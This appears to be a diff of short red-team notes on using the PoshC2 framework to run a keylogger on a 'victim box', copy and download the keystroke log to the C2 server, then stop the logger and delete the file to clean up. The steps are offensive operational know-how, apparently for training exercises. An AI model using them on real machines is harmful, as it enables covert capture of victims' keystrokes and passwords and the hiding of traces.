ChefDandy/CTE-menu/Poshc2/instructions/Input_capture.md

 ##Starts the Keylogger(realtime on poshc2 Server)

 start-keystrokes-writefile
-##record this file location(.log) this in on victim box
+##record this filelocation(.log) this in on victim box

 ### Keylogger is now running until Stopped ### Typically used if keylogger is being ran over a set time"

+copy "fileLocation(.log)" "Sameplace newname(.log)"
+#make a copy to download after the logger has been running

-Download-file "C:\keylogname.log"
+Download-file "path of newname.log"
 ## Gets put into /var/poshc2/*projectname*/downloads

 Stop-Keystrokes
 ##Stop keylogger for cleanup

-posh-delete C:\<same place with new filename>
+posh-delete C:\<same place new filename>
 ##Cleaning up file created

+#you cant delete the original filelocation if the implant is still up. will get file in use error.
 ```
 ---